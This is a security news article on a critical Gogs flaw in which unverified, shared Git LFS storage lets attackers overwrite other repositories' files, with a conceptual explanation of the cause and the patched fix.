Critical 9.3 CVSS Flaw in Gogs Turns Repositories into Malware Delivery Vectors

The Gogs project, a popular self-hosted Git service prized for its simplicity and painless setup, has been hit by a critical security flaw that could turn trusted repositories into delivery vectors for malware. CVE-2026-25921, sporting a severe CVSS score of 9.3, exposes a fundamental weakness in how Gogs handles Large File Storage (LFS).

The core of the issue lies in a lack of isolation between repositories. Gogs currently stores all LFS objects in a single shared directory without concatenating the unique repository ID to the storage path.

The technical breakdown of the risk involves two critical failures:

• Path Collision: Because the storage path is determined solely by the file’s OID (Object ID), any repository can target the same file path on the server.
• Missing Content Hash Verification: Gogs does not verify that the content of an uploaded LFS file actually matches its claimed SHA-256 hash.

As the advisory notes regarding the underlying code: “Gogs does not verify uploaded LFS file content against its claimed SHA-256, meaning attackers can manipulate the uploaded file like injecting backdoor.”

The vulnerability is exacerbated by an architectural assumption that client retries are always benign. The source code contains a note suggesting it is “OK” to leave partial files because a retry will “safely overwrite” them, assuming the OID is unique. However, “this assumption does not hold in the case of a malicious client”. An attacker can intentionally provide a legitimate OID for a file they don’t own and overwrite it with a malicious version.

This flaw opens the door to devastating supply-chain attacks.

Attackers can overwrite common LFS objects—such as large binaries, datasets, or media—across different repositories.

When a legitimate user downloads an affected LFS object from the Gogs webpage, the system provides no warning that the file has been tampered with.

All LFS objects hosted on a Gogs instance are vulnerable to being maliciously replaced.

The Gogs team has addressed this vulnerability in the latest release. Administrators are urged to upgrade immediately. The fix ensures that uploaded LFS objects are verified to guarantee their content matches the claimed SHA-256 hash, preventing the upload of tampered or malicious files.